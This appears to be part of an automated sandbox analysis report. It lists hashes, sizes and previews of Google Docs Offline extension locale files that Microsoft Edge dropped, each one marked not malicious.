                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3830
                                                                                                                                                                                                                                                        Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                        MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                        SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                        SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                        SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1898
                                                                                                                                                                                                                                                        Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                        MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                        SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                        SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                        SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                        Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                        MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                        SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                        SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                        SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):878
                                                                                                                                                                                                                                                        Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                        MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                        SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                        SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                        SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2766
                                                                                                                                                                                                                                                        Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                        MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                        SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                        SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                        SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):978
                                                                                                                                                                                                                                                        Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                        MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                        SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                        SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                        SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):907
                                                                                                                                                                                                                                                        Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                        MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                        SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                        SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                        SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                        Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                        MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                        SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                        SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                        SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):937
                                                                                                                                                                                                                                                        Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                        MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                        SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                        SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                        SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1337
                                                                                                                                                                                                                                                        Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                        MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                        SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                        SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                        SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2846
                                                                                                                                                                                                                                                        Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                        MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                        SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                        SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                        SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):934
                                                                                                                                                                                                                                                        Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                        MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                        SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                        SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                        SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):963
                                                                                                                                                                                                                                                        Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                        MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                        SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                        SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                        SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1320
                                                                                                                                                                                                                                                        Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                        MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                        SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                        SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                        SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):884
